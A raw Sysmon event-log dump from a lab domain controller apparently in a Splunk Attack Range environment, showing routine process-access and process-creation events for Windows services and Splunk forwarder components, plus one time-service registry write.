10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.021{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.927{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:49.928{59A5CD1D-8FA5-6005-0001-00000000A301}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:40:06.646{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x6eada180) 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
